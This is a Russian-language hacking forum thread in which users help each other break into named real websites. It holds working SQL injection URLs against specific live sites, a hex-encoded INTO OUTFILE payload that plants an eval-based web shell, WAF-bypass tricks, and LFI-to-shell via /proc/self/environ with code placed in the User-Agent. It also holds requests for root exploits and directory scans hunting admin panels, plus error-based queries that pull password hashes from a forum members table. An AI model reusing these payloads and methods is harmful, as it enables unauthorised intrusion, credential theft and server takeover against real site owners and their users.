этот (http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/)
эксплоит, но при запуске пишет:
В эксплоите поменял всего две строчки: $pma_setup_url (указал сайт на котором нужно выполнить код) и $ftp_code (указал доступ к файлу на фтп где мой код).
Что не так сделал?


версия пихипе какая? Если ниже 5 - не будет работать. Плюс могли и пропатчить, так сплойт - паблик. Но и для 4-ой версии есть вариант - исполнение локального файла, при знании асболютного пути и при возможности залить хотя бы аватарку

basic авторизация на пма стоит?


Это где? Переменной $pma вообще нет, только $pma_setup_url.

Где поставить басик авторизацию?

PHP 5.2.

CyberHunter said:
Это где? Переменной $pma вообще нет, только $pma_setup_url.
Где поставить басик авторизацию?


На атакуймом сайте на setup.php стоит басик авторизация?

помогите найти админку плыз))

draytek.com

помогите найти админку плыз))
draytek.com


http://myvigor.draytek.com/reg/relogin.php?src=DrayTekPortal

Это не подходит?

как в ipb 3 залить шелл?

547 said:
как в ipb 3 залить шелл?


/showpost.php?p=1767296&postcount=38

и

/showpost.php?p=1870155&postcount=40

30 секунд поиска

Подскажите плз. Мускул-инъекция,

пишу union+select+group_concat(TABLE_NAME)+from+informa tion_schema.tables/*

показывает ОДНО (нету многих таблиц)

а когда запрос

union+select+1,2,3,4,5,6,7,8,9,10,TABLE_NAMe+from+ information_schema.tables+limit+96,1/*

я нахожу вот другие таблицы

почему так???

stasiliy said:
Подскажите плз. Мускул-инъекция,
пишу union+select+group_concat(TABLE_NAME)+from+informa tion_schema.tables/*
показывает ОДНО (нету многих таблиц)
а когда запрос
union+select+1,2,3,4,5,6,7,8,9,10,TABLE_NAMe+from+ information_schema.tables+limit+96,1/*
я нахожу вот другие таблицы
почему так???


Ограничение наколичество выводимых символов по ходу:

group_concat_max_len

stasiliy said:
Подскажите плз. Мускул-инъекция,
пишу union+select+group_concat(TABLE_NAME)+from+informa tion_schema.tables/*
показывает ОДНО (нету многих таблиц)
а когда запрос
union+select+1,2,3,4,5,6,7,8,9,10,TABLE_NAMe+from+ information_schema.tables+limit+96,1/*
я нахожу вот другие таблицы
почему так???



потому что group_concat() по дефолту ограничен 1024 символами. по этому не все таблицы выводятся

_http://webi.ru/webi_articles/8_14_f.html

есть шелл на сайте,как поднять права на ос WindowsNT U6 0 6 x86?

Добрый вечер.

Нашел сайт (elnino.ru) со следующей версией движка:





Перепробовал все примеры последних 4-х страниц темы "Обзор уязвимостей CMS Joomla", но безрезультатно...

Не могли бы вы помочь/разъяснить, что делаю не так?!

Перепробовал все примеры последних 4-х страниц темы "Обзор уязвимостей CMS Joomla", но безрезультатно...
Не могли бы вы помочь/разъяснить, что делаю не так?!


В ядре джумлы мало уязвимостей, смотри на компоненты которые есть на сайте.

Iggy said:
Добрый вечер.
Нашел сайт (elnino.ru) со следующей версией движка:
Перепробовал все примеры последних 4-х страниц темы "Обзор уязвимостей CMS Joomla", но безрезультатно...
Не могли бы вы помочь/разъяснить, что делаю не так?!


мало ли что делаешь, не факт что уязвимости есть на том сайте, может баги прикрыли или версия цмс=ки обновленная..так что сам подумай если багу выложили в паблик, как долго она проживет?...вот именно..правильно подумал..

Iggy said:
Добрый вечер.
Нашел сайт (elnino.ru) со следующей версией движка:
Перепробовал все примеры последних 4-х страниц темы "Обзор уязвимостей CMS Joomla", но безрезультатно...
Не могли бы вы помочь/разъяснить, что делаю не так?!


ты посмотрел 1-м способом

это далеко не неопределенная версия лучше уточни первым способом...

Здравствуйте. Подскажите, плз, такую вещь - имеется доступ в админку сайта на HostCMS. Можно ли этим воспользоваться и слить весь сайт целиком?

CyberHunter said:
В ядре джумлы мало уязвимостей, смотри на компоненты которые есть на сайте.


Нигде больше, кроме просмотра страниц с фотками в галерее, переменных, которые принимают параметры, нет...


547 said:
ты посмотрел 1-м способом
это далеко не неопределенная версия лучше уточни первым способом...


Я посмотрел версию в исходниках админки, как ты написал в своем посте (site.com/administrator), но твой способ LFI не работает на этом сайте почему-то...(404 ошибка)


dimm666 said:
Здравствуйте. Подскажите, плз, такую вещь - имеется доступ в админку сайта на HostCMS. Можно ли этим воспользоваться и слить весь сайт целиком?


Ну так поудаляй все оттуда...

Iggy said:
Ну так поудаляй все оттуда...


Нееее, =)))) , надо именно слить его целиком себе, т.е. получить полную его копию.

dimm666 said:
Нееее, =)))) , надо именно слить его целиком себе, т.е. получить полную его копию.


попробуй залить шелл..а там уже и ежу понятно что делатЬ

помогите найти админу=)

heimlichinstitute.com

2 Iggy

Я посмотрел версию в исходниках админки, как ты написал в своем посте (site.com/administrator), но твой способ LFI не работает на этом сайте почему-то...(404 ошибка)

ну это понятно,ты выяснил что джумла 1.5.x

но это еще не все, тебе надо теперь выяснить бета это или какой версии релиз?

но неполучится у тебя это зделать нету необходимых файлов чтобы посмотреть версию

да и параметров которые я указывал,у тебя они вообще отсутствуют на сайте,так что...

1.5.0 Release Candidate 3

* @version $Id: configuration.php-dist 8946 2007-09-18 14:26:22Z louis $

1.5.0 Release Candidate 2

* @version $Id: configuration.php-dist 8290 2007-08-01 14:03:11Z jinx $

1.5.0 Release Candidate 1

* @version $Id: configuration.php-dist 7740 2007-06-13 21:01:25Z laurens $

1.5.0 Beta 2

* @version $Id: configuration.php-dist 6691 2007-02-21 09:29:26Z Jinx $

1.5.0 Beta

* @version $Id: configuration.php-dist 5361 2006-10-07 19:21:08Z Jinx $

http://brahmos.com

гдэ собстнэ админка?

спс.

ZARO said:
http://brahmos.com
гдэ собстнэ админка?
спс.


попробуй http://brahmos.com/ControlPanel/

547 said:
2 Iggy
Я посмотрел версию в исходниках админки, как ты написал в своем посте (site.com/administrator), но твой способ LFI не работает на этом сайте почему-то...(404 ошибка)
ну это понятно,ты выяснил что джумла 1.5.
x
но это еще не все, тебе надо теперь выяснить бета это или какой версии релиз?
но неполучится у тебя это зделать нету необходимых файлов чтобы посмотреть версию
да и параметров которые я указывал,у тебя они вообще отсутствуют на сайте,так что...
1.5.0 Release Candidate 3
* @version $Id: configuration.php-dist 8946 2007-09-18 14:26:22Z louis $
1.5.0 Release Candidate 2
* @version $Id: configuration.php-dist 8290 2007-08-01 14:03:11Z jinx $
1.5.0 Release Candidate 1
* @version $Id: configuration.php-dist 7740 2007-06-13 21:01:25Z laurens $
1.5.0 Beta 2
* @version $Id: configuration.php-dist 6691 2007-02-21 09:29:26Z Jinx $
1.5.0 Beta
* @version $Id: configuration.php-dist 5361 2006-10-07 19:21:08Z Jinx $


Благодарю.

Вот еще подскажи - разумно ли брутить админку на этом CMS? (интересует почему именнонет/да)

Разверни ответ, если не сложно...

Iggy said:
Благодарю.
Вот еще подскажи - разумно ли брутить админку на этом CMS? (интересует
почему именно
нет/да)
Разверни ответ, если не сложно...


не подскажу,потому как не пробовал брутить админки...

Всем привет!

Подскажите root сплойт на:

FreeBSD *.com 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Wed May 27 04:46:55 MSD 2009 root@:/usr/obj/usr/src/sys/ISPSYSTEM amd64

Server software: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8e DAV/2 PHP/5.3.2

Loaded Apache modules: core, prefork, http_core, mod_so, mod_authn_file, mod_authn_dbm, mod_authn_anon, mod_authn_default, mod_authn_alias, mod_authz_host, mod_authz_groupfile, mod_authz_user, mod_authz_dbm, mod_authz_owner, mod_authz_default, mod_auth_basic, mod_auth_digest, mod_file_cache, mod_cache, mod_disk_cache, mod_dumpio, mod_reqtimeout, mod_include, mod_filter, mod_charset_lite, mod_deflate, mod_log_config, mod_logio, mod_env, mod_mime_magic, mod_cern_meta, mod_expires, mod_headers, mod_usertrack, mod_setenvif, mod_version, mod_proxy, mod_proxy_http, mod_ssl, mod_mime, mod_dav, mod_status, mod_autoindex, mod_asis, mod_info, mod_suexec, mod_cgi, mod_dav_fs, mod_vhost_alias, mod_negotiation, mod_dir, mod_imagemap, mod_actions, mod_speling, mod_userdir, mod_alias, mod_rewrite, mod_php5, mod_ispmgr

Disabled PHP Functions: none

Open base dir: /home/vice/data:.

cURL support: no

Supported databases: MySql (5.1.47)

Readable /etc/passwd: no

Readable /etc/shadow: no

Userful: gcc, cc, ld, make, perl, tar, gzip, bzip2, nc, locate

Danger: ipfw

Downloaders: fetch

ZARO said:
http://brahmos.com
гдэ собстнэ админка?
спс.


Поищи тут админку!

» http://brahmos.com/.htaccess HTTP 403 Forbidden

» http://brahmos.com/.htconfig HTTP 403 Forbidden

» http://brahmos.com/.htpasswd HTTP 403 Forbidden

» http://brahmos.com/archive/ HTTP 200 OK

» http://brahmos.com/backoffice/ HTTP 200 OK

» http://brahmos.com/cgi-bin/ HTTP 401 Authorization Required

» http://brahmos.com/ControlPanel/ HTTP 200 OK

» http://brahmos.com/config/ HTTP 200 OK

» http://brahmos.com/download/ HTTP 200 OK

» http://brahmos.com/downloads/ HTTP 302 Found

» http://brahmos.com/error/ HTTP 403 Forbidden

» http://brahmos.com/gallery/ HTTP 200 OK

» http://brahmos.com/images/ HTTP 200 OK

» http://brahmos.com/login/ HTTP 200 OK

» http://brahmos.com/style/ HTTP 200 OK

» http://brahmos.com/test/ HTTP 200 OK

» http://brahmos.com/content/ HTTP 200 OK

» http://brahmos.com/favicon.ico HTTP 200 OK

» http://brahmos.com/icons/ HTTP 200 OK

» http://brahmos.com/index.html HTTP 200 OK

» http://brahmos.com/log/ HTTP 200 OK

» http://brahmos.com/login.php HTTP 200 OK

» http://brahmos.com/manual/ HTTP 200 OK

» http://brahmos.com/sitemap.html HTTP 200 OK

» http://brahmos.com/test.php HTTP 200 OK

» http://brahmos.com/webmail/ HTTP 302 Found

2IMMORTAL_S

Попробуй /threadnav160377-1-10.html

to wkar: сп, я пробовал уже его... что-то не сработал.

Пакет не сработал.. делал в ручную.. program.c нормально скомпилился, а вот env.c при компиляции выдал ошибки(какие точно не помню), но файл откомпиленный появился.

Народ, что посоветуете?

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' into outfile \'/home/buddhatour/data/www/buddhatour.' at line 1

запрос:


PHP:
http://www.buddhatour.ru/new/?link=1+union+select+''+into+outfile+'/home/buddhatour/data/www/buddhatour.ru/e.php'

Подскажите, где ошибка?

ПС

Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/

wkar said:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' into outfile \'/home/buddhatour/data/www/buddhatour.' at line 1

запрос:

PHP:
http://www.buddhatour.ru/new/?link=1+union+select+''+into+outfile+'/home/buddhatour/data/www/buddhatour.ru/e.php'

Подскажите, где ошибка?
ПС
Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/


1. Подобрать кол-во полей, а не пытаться сразу лить шелл


Code:
http://www.buddhatour.ru/new/?link=1+union+select+1,version(),3,4+limit+1,1--+

или так:

http://www.buddhatour.ru/new/?link=(select+1+from+(select+count(0),concat((sele ct+version()),floor(rand(0)*2))+from+information_s chema.tables+group+by+2+limit+1)a)--+

2. file_priv=N, ни о какой заливке шелла через скулю здесь речи идти не может.

wkar said:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' into outfile \'/home/buddhatour/data/www/buddhatour.' at line 1

запрос:

PHP:
http://www.buddhatour.ru/new/?link=1+union+select+''+into+outfile+'/home/buddhatour/data/www/buddhatour.ru/e.php'

Подскажите, где ошибка?
ПС
Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/


В union select во-первых 4 столбца, во-вторых magic_quotes = On

Но это можно обойти, так как второй параметр учавствует в другом запросе...


Code:
http://www.buddhatour.ru/new/?link=-1+union+select+1,0x3120616E64202873656C65637420273 C3F706870206576616C28245F4745545B765D293B3F3E27206 96E746F206F757466696C6520272F686F6D652F62756464686 1746F75722F646174612F7777772F627564646861746F75722 E72752F65652E7068702729,3,4

Второй столбец это "1 and (select '' into outfile '/home/buddhatour/data/www/buddhatour.ru/ee.php')"

Но тут мы опять же ничего не получаем


Code:
Access denied for user 'buddhatour_budd'@'localhost' (using password: YES)

Вроде бы так...

Пока писал, меня 2 раза опередили)

вопрос чисто теоретический:

при раскрутке стандартной mssql инъекции пару раз сталкивался что при запросе:

1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='table_name'+AND+C OLUMN_NAME+NOT+IN+('column'))--

скуль плевать хотела на имя таблицы и выдавала колонки из всех таблиц в алфавитном порядке. именно поэтому, на мой взгляд, возникали проблемы с автоматическими инжекторами, которые не могли вывести колонки.

собственно вопрос, почему выводятся все колонки из всех таблиц, а не из заданой?

Пример в студию ускорил бы решение вашей проблемы, да, бывают специфичные ситуации

PS: Вообще not in и перечислять там имена колонок тупо - тухлец способ по определению

Вот если брать одну из mssql-инъекций в "Ваши sql-инъекции":

/showpost.php?p=2168515&postcount=12236


Code:
http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=@@version--

то для выяснения колонок из таблицы User ми бы рекомендовал бы такую конструкцию (как показала практика - самая универсальная для различных ситуаций):


Code:
http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=(select+max(column_name)+from+(s elect+top+1+column_name+from+information_schema.co lumns+where+table_name=char(85)%2bchar(115)%2bchar (101)%2bchar(114)+and+column_name+not+in+(select+t op+1+column_name+from+information_schema.columns+w here+table_name=char(85)%2bchar(115)%2bchar(101)%2 bchar(114)+order+by+column_name)+order+by+column_n ame)a)--

получим City


Code:
http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=(select+max(column_name)+from+(s elect+top+1+column_name+from+information_schema.co lumns+where+table_name=char(85)%2bchar(115)%2bchar (101)%2bchar(114)+and+column_name+not+in+(select+t op+2+column_name+from+information_schema.columns+w here+table_name=char(85)%2bchar(115)%2bchar(101)%2 bchar(114)+order+by+column_name)+order+by+column_n ame)a)--

получим Class

.....

во втором случае меняется

.....not+in+(select+top+2....

Pashkela said:
Пример в студию ускорил бы решение вашей проблемы, да, бывают специфичные ситуации
PS: Вообще not in - тухлец способ по определению


примерчик:

http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=%28SELECT+TOP+ 1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHER E+TABLE_NAME=%27Utenti%27+AND+COLUMN_NAME+NOT+IN+% 28%27binary_message_body%27,%27cap%27,%27Cat%27,%2 7Categoria%27,%27cell%27,%27cod%27,%27conversation _group_id%27,%27conversation_handle%27,%27data%27, %27fax%27,%27figli%27,%27fragment_bitmap%27,%27fra gment_size%27,%27fuma%27,%27h%27,%27hob%27,%27id%2 7,%27Idc%27,%27ind%27,%27lingue%27,%27mail%27,%27m essage_id%27,%27message_sequence_number%27,%27mess age_type_id%27,%27nazione%27,%27newsCorpo%27,%27ne wsDataInserim%27,%27newsFoto%27,%27newsId%27,%27ne wsSospesa%27,%27newsTitolo%27,%27next_fragment%27, %27nome%27,%27occ%27,%27p%27,%27paese%27,%27patn%2 7,%27person%27,%27priority%27,%27prof%27,%27prov%2 7,%27queuing_order%27,%27regi%27,%27resp%27,%27ser vice_contract_id%27,%27service_id%27,%27skype%27,% 27stato%27,%27status%27,%27tel%27,%27titolo%27,%27 url1%27,%27url2%27,%27url3%27,%27url4%27,%27urlpic %27,%27userId%27,%27userLevel%27,%27userName%27,%2 7userPwd%27%29%29--

а что есть не из тухлых способов?

durito said:
примерчик:
а что есть не из тухлых способов?


вот конкретно относительно вашего примерчика и таблицы News:


Code:
HOST: www.feliceincontro.net
-----------------------------------------
System information:
-----------------------------------------
@@version: Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
May 26 2009 14:24:20
Copyright (c) 1988-2005 Microsoft Corporation
Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

system_user: MSSql18332
db_name(): MSSql18332
=============================================
Tables in information_schema:
=============================================
annunci
foto
Categoria
News
Utenti
sedi
-----------------------------------------
Columns from table [ News ]
-----------------------------------------
newsCorpo - колонка

http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(co lumn_name)+from+(select+top+1+column_name+from+inf ormation_schema.columns+where+table_name=char(78)% 2bchar(101)%2bchar(119)%2bchar(115)+and+column_nam e+not+in+(select+top+0+column_name+from+informatio n_schema.columns+where+table_name=char(78)%2bchar( 101)%2bchar(119)%2bchar(115)+order+by+column_name) +order+by+column_name)a)

newsDataInserim - - колонка

http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(co lumn_name)+from+(select+top+1+column_name+from+inf ormation_schema.columns+where+table_name=char(78)% 2bchar(101)%2bchar(119)%2bchar(115)+and+column_nam e+not+in+(select+top+1+column_name+from+informatio n_schema.columns+where+table_name=char(78)%2bchar( 101)%2bchar(119)%2bchar(115)+order+by+column_name) +order+by+column_name)a)

newsFoto - колонка

http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(co lumn_name)+from+(select+top+1+column_name+from+inf ormation_schema.columns+where+table_name=char(78)% 2bchar(101)%2bchar(119)%2bchar(115)+and+column_nam e+not+in+(select+top+2+column_name+from+informatio n_schema.columns+where+table_name=char(78)%2bchar( 101)%2bchar(119)%2bchar(115)+order+by+column_name) +order+by+column_name)a)

newsTitolo - колонка

http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(co lumn_name)+from+(select+top+1+column_name+from+inf ormation_schema.columns+where+table_name=char(78)% 2bchar(101)%2bchar(119)%2bchar(115)+and+column_nam e+not+in+(select+top+5+column_name+from+informatio n_schema.columns+where+table_name=char(78)%2bchar( 101)%2bchar(119)%2bchar(115)+order+by+column_name) +order+by+column_name)a)

newsSospesa - колонка

http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(co lumn_name)+from+(select+top+1+column_name+from+inf ormation_schema.columns+where+table_name=char(78)% 2bchar(101)%2bchar(119)%2bchar(115)+and+column_nam e+not+in+(select+top+4+column_name+from+informatio n_schema.columns+where+table_name=char(78)%2bchar( 101)%2bchar(119)%2bchar(115)+order+by+column_name) +order+by+column_name)a)

newsId - колонка

http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(co lumn_name)+from+(select+top+1+column_name+from+inf ormation_schema.columns+where+table_name=char(78)% 2bchar(101)%2bchar(119)%2bchar(115)+and+column_nam e+not+in+(select+top+3+column_name+from+informatio n_schema.columns+where+table_name=char(78)%2bchar( 101)%2bchar(119)%2bchar(115)+order+by+column_name) +order+by+column_name)a)

wkar said:
ПС
Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/


Сп... но написано, что "Этот файл всё ещё заливается!". Залей еще куданить, pls

http://oragir.am/news.php?id=13%27a


здесь sql inj ?


http://oragir.am/news.php?id=13+union+select+0


ето филтрация ?

и как обходит ?

k2b1~ said:
здесь sql inj ?
и как обходит ?


Методом "тыка" удалось извлечь, все что попадает в параметр id и этот же момент != int, идет под откос.


k2b1~ said:
ето филтрация ?


Присутствует проверка от "неправильных" обращений к серверу. Паблик способами решить эту проблему не сможете.

v1d0qz said:
Методом "тыка" удалось извлечь, все что попадает в параметр id и этот же момент != int, идет под откос.
Присутствует проверка от "неправильных" обращений к серверу. Паблик способами решить эту проблему не сможете.


Все правильно написано только смущает одно, что там два залитых шелла!

» http://oragir.am/.htaccess HTTP 403 Forbidden

» http://oragir.am/.htconfig HTTP 403 Forbidden

» http://oragir.am/.htpasswd HTTP 403 Forbidden

» http://oragir.am/cgi-bin/ HTTP 403 Forbidden

» http://oragir.am/cgi-sys/ HTTP 403 Forbidden

» http://oragir.am/images/ HTTP 403 Forbidden

» http://oragir.am/js/ HTTP 403 Forbidden

» http://oragir.am/new/ HTTP 200 OK

» http://oragir.am/_private/ HTTP 401 Authorization Required

» http://oragir.am/includes/ HTTP 200 OK

» http://oragir.am/server-status/ HTTP 403 Forbidden

» http://oragir.am/error_log HTTP 403 Forbidden

» http://oragir.am/administrator/ HTTP 200 OK

» http://oragir.am/also order_log.dat HTTP 403 Forbidden

» http://oragir.am/cpanel/ HTTP 301 Moved Permanently

» http://oragir.am/icons/ HTTP 200 OK

» http://oragir.am/index.php HTTP 200 OK

» http://oragir.am/lang/ HTTP 403 Forbidden

» http://oragir.am/manual/ HTTP 200 OK

» http://oragir.am/news/ HTTP 403 Forbidden

» http://oragir.am/phpmyadmin/ HTTP 401 Authorization Required

» http://oragir.am/phpshell.php HTTP 403 Forbidden

» http://oragir.am/shell.php HTTP 403 Forbidden

» http://oragir.am/webadmin.nsf HTTP 403 Forbidden

» http://oragir.am/webmail/ HTTP 301 Moved Permanently

• Possible engine => FrontPage:

» http://oragir.am/_vti_bin/ HTTP 403 Forbidden

» http://oragir.am/_vti_bin/_vti_adm/ HTTP 403 Forbidden

» http://oragir.am/_vti_bin/_vti_aut/ HTTP 403 Forbidden

» http://oragir.am/_vti_cnf/ HTTP 403 Forbidden

» http://oragir.am/_vti_log/ HTTP 403 Forbidden

» http://oragir.am/_vti_pvt/ HTTP 403 Forbidden

» http://oragir.am/_vti_txt/ HTTP 403 Forbidden

Url уязвим :

http://www.jocuripentrucopii.eu/play_game.php?nume_joc=Darts%27

Query failed - reason1:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Darts'')' at line 1

попробовать много, но я не могу найти SQLI и столбцов

2 linuxkernal

если понадобится закомментировать оставшуюся часть запроса, то можно вприницпе так


Code:
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=Darts')+and+substring(versi on(),1,1)=5**+

А вот union select вставить не получилось, потому что выдает 403 даже на asdunionasdselectasd

http://www.jocuripentrucopii.eu/play_game.php?nume_joc=1')+ORDER+BY+22%23

http://www.jocuripentrucopii.eu/play_game.php?nume_joc=9999999')+/*!UNION*/+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22%23

хмм фильтр обошел но незнаю зачем она ругается...

pinch said:
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=1')+ORDER+BY+22%23
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=9999999')+/*!UNION*/+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22%23
хмм фильтр обошел но незнаю зачем она ругается...


Смотри внимательно ошибку. * заменяется на -

Code:
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=9999999%27%29+and+%27/*%27+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22%23

хех, видимая)

общими усилиями, так сказать, раскрутили..)

Так, предыдущий пост удалил, чтобы было немонго понятней (Сюда закинул только блинку). Вообщем вот она.

http://www.jocuripentrucopii.eu/play_game.php?nume_joc=Darts')+and+substring(versi on(),1,1)=5+and+1=('1

И все же докрутил как хотел, кому интересно, вот > http://www.jocuripentrucopii.eu/play_game.php?nume_joc=')+or+(select+Count(0),Conc at(version(),floor(rand(0)/(1/2)))from(information_schema.columns)GROUP+by+2)=(1 ,'1

Народ помогите разобраться как заюзать багу. Не могу сообразить как надо сформировать запрос. Вот типа патч от этой баги. http://drupal.org/files/sa-2008-067/SA-2008-067-5.11.patch

Я та понял что можно подменить занчение $_SERVER['HTTP_HOST'] , но блин ничего не выходит ;(

v1d0qz said:
Методом "тыка" удалось извлечь, все что попадает в параметр id и этот же момент != int, идет под откос.
Присутствует проверка от "неправильных" обращений к серверу. Паблик способами решить эту проблему не сможете.


v1d0qz , значит нет варианта ?

http://oragir.am/news.php?id=13%27a

Посоветуйте рут сплойт для:

Linux *.com 2.6.32.10-90.fc12.i686.PAE #1 SMP Tue Mar 23 10:04:28 UTC 2010 i686

Что-то подходящего не нашел

IMMORTAL_S said:
Посоветуйте рут сплойт для:
Linux *.com 2.6.32.10-90.fc12.i686.PAE #1 SMP Tue Mar 23 10:04:28 UTC 2010 i686
Что-то подходящего не нашел


Дату смотри. Сам то как думаешь, есть ли такие вещи в паблике? )

другого ответа я не ожидал))

вот еще одна гимморная скуль:

http://www.caffmoscommunity.com/show_review.asp?rid=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES)--

а вот вывести имя второй таблицы уже проблема

Еще 15 минут назад сам не знал. но использовал гугл

http://www.caffmoscommunity.com/show_review.asp?rid=%28SELECT+TABLE_NAME+FROM+%20I NFORMATION_SCHEMA.TABLES%20for%20xml%20raw%29--

Информацию получил с http://raz0r.name/obzory/select-for-xml-sql-injection/

как быть тут?

http://fixwap.net/ru/html/complain.php?uid=-1%20OR%2017-7=10

Нуждаюсь в помощис флуром.


DB Detection: MySQL error based
Method: GET
Type: Integer


типо самописный модуль для ipb 1.31

урл засветить к сожалению не могу.

запрос возвращающий юзера:


id=201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


result:


mySQL query error: SELECT * FROM ibf_photo_albums WHERE album_member = 201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
ORDER BY album_time DESC
from_file: /var/www/***********photo.php from_line:193
mySQL error: Duplicate entry '~'mysql@192.168.0.1'~1' for key 'group_key'
mySQL error code:


пробую выбирать из таблы:


id=201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


и получаю:


mySQL query error: SELECT * FROM ibf_photo_albums WHERE album_member = 2059844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
ORDER BY album_time DESC
from_file: /var/www/***********photo.php from_line:193
mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.t' at line 1
mySQL error code:

#Wolf# попробуй зачарить

Konqi said:
#Wolf#
попробуй зачарить




mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'char(105,98,102,95,109,101,109,98,101,114,115) limit 0,1),floor(rand(0)*2))x fro' at line 1
mySQL error code:


...

Таблы хексить нельзя...

Ctacok said:
Таблы хексить нельзя...


все равно не работает, уже все перепробовал.

id=201255656844 and(select 1 from(select count(*),concat((select password from табла_с_юзерами limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


эм =\

Ctacok said:
эм =\


спасибо, но


mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
''ampersand#95;members
limit 0,1),floor(rand(0)*2))x from information_schema.tables group ' at line 1


символ "_" не пускает?

#Wolf# said:
спасибо, но
символ "_" не пускает?


Странно, ведь information_schema пропустил же.

Ctacok said:
Странно, ведь information_schema пропустил же.


да, вот что заметил, нормально могу читать все таблы, кроме тех, который начинаются на ibf_ .

Хотя структуру их я могу смотреть, а "get data" нет =(

есть мысли?

#Wolf#, попробуй -


Code:
id=201255656844 and(select 1 from(select count(*),concat((select converge_pass_hash from `ibf_members_converge` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

-------------------


CyberHunter said:
Скажите как можно залить шелл через LFI?
Вот например
тут (http://www.stolarzowice.info/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00)
И какие нужны права на это?


Как вариант, можно регнуться, залить аватар с пхп кодом и проинклудить. Или инклудь логи, подробнее тут (http://www.xakep.ru/post/49508/default.asp)

_http://www.stolarzowice.info/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../proc/self/environ%00

в User-Agent пишешь код шелла.

-------------------


SeNaP said:
как быть тут?
http://fixwap.net/ru/html/complain.php?uid=-1%20OR%2017-7=10


http://fixwap.net/ru/html/complain.php?uid=26300+and+mid(version(),1,1)=4 -> false

http://fixwap.net/ru/html/complain.php?uid=26300+and+mid(version(),1,1)=5 -> true

Скажите как можно залить шелл через LFI?

Вот например тут (http://www.stolarzowice.info/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00)

И какие нужны права на это?

:."]
.:[melkiy]:. said:
#Wolf#,
попробуй -

Code:
id=201255656844 and(select 1 from(select count(*),concat((select converge_pass_hash from `ibf_members_converge` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1



нет такой таблицы. версия 1.3.1

Как правильно составить двойной запрос?


PHP:

functionrecordcount_new($ps_sql){

global$conn_s;

$rs_s2=mysql_query("select COUNT(CODE) as count1 from ".$ps_sql,$conn_s);

$rs_s=mysql_fetch_array($rs_s2);

$pi_recordcount=$rs_s['count1'];

mysql_free_result($rs_s2);

if ($pi_recordcount=="")$pi_recordcount=0;

return$pi_recordcount;

}





PHP:
$rs_2=mysql_query("select * from tbl_subkat where KATCODE=".$GET['id']." order by POSITION, NAZV",$conn1);

while (($rs=mysql_fetch_assoc($rs_2))!==false) {

$pi2=recordcount_new("tbl_base where ISMODER=1 and (SUBKAT1=".$rs['CODE']." or SUBKAT2=".$rs['CODE']." or SUBKAT3=".$rs['CODE'].")");



if ($pi2>0) echo' ('.$pi2.')';

}




